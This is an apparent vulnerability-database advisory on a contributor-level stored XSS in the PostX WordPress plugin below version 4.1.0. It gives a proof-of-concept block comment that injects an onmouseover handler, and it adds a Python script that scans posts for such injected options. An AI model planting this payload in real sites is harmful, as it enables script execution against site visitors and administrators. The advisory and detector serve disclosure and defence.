wpexploit | Dmitrii Ignatyev | WPEX-ID:635BE98D-4C17-4E75-871F-9794D85A2EB1
May 27, 2024 - 12:00 a.m.

PostX < 4.1.0 - Contributor+ Stored XSS

postx contributor+ stored xss
poc
june 10 2024
exploit

AI Score: 8.3 High (Confidence: High)

Description

The plugin does not validate and escape some of its block options before outputting them back in a page/post where the block is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.

As a contributor, put the below code in a post while in Code Editor mode:

<!-- wp:ultimate-post/post-grid-3 {"blockId":"d57ca5","currentPostId":"2198","filterShow":true,"paginationShow":true,"readMore":true,"contentTag":"section","openInTab":true,"headingText":"123","headingURL":"123","headingTag":"h5","titleTag":"h6","metaMinText":"123","metaAuthorPrefix":"123","fallbackImg":{"url":"123","id":99999},"readMoreText":"123","filterText":"ClickMe!","filterMobileText":"\u0022onmouseover='alert(/XSS/)'","loadMoreText":"123"} /-->

The XSS will be triggered when (pre)viewing the post and moving the mouse over the ClickMe! text.
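
For triage, the following added example (not part of the advisory or the plugin's code) scans stored post content for PostX block comments and lists string options that contain attribute-breaking characters or inline event handlers. The regexes, function names and sample post are assumptions constructed for illustration, modelled on the block markup above.

```python
import json
import re

# Gutenberg stores a block as an HTML comment: <!-- wp:namespace/name {json} /-->
BLOCK_RE = re.compile(r"<!--\s+wp:(ultimate-post/[a-z0-9-]+)\s+(\{.*?\})\s+/?-->", re.S)
# Characters that can close an HTML attribute or tag, or an inline event handler.
# Apostrophes in ordinary text also match, so findings are review candidates.
SUSPICIOUS_RE = re.compile(r"""["'<>]|\bon[a-z]+\s*=""", re.I)

# Constructed sample post, modelled on the block markup shown in this advisory.
SAMPLE_POST = r'''<p>Intro</p>
<!-- wp:ultimate-post/post-grid-3 {"blockId":"d57ca5","fallbackImg":{"url":"123","id":99999},"filterText":"ClickMe!","filterMobileText":"\u0022onmouseover='alert(/XSS/)'"} /-->
<!-- wp:paragraph --><p>Plain text</p><!-- /wp:paragraph -->'''


def iter_strings(value, path=""):
    """Yield (path, string) for every string nested in decoded block attributes."""
    if isinstance(value, str):
        yield path, value
    elif isinstance(value, dict):
        for key, item in value.items():
            yield from iter_strings(item, f"{path}.{key}" if path else key)
    elif isinstance(value, list):
        for index, item in enumerate(value):
            yield from iter_strings(item, f"{path}[{index}]")


def find_suspicious_options(post_content):
    """Return (block name, option path, value) for PostX options worth reviewing."""
    findings = []
    for match in BLOCK_RE.finditer(post_content):
        try:
            attrs = json.loads(match.group(2))  # decodes \u0022 to a literal quote
        except json.JSONDecodeError:
            findings.append((match.group(1), "<unparseable attributes>", match.group(2)))
            continue
        for path, text in iter_strings(attrs):
            if SUSPICIOUS_RE.search(text):
                findings.append((match.group(1), path, text))
    return findings


if __name__ == "__main__":
    for block, option, value in find_suspicious_options(SAMPLE_POST):
        print(f"{block}: option {option!r} = {value!r}")
```

The same function can be run over each row of `post_content` exported from the `wp_posts` table, including revisions and drafts submitted by contributors.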
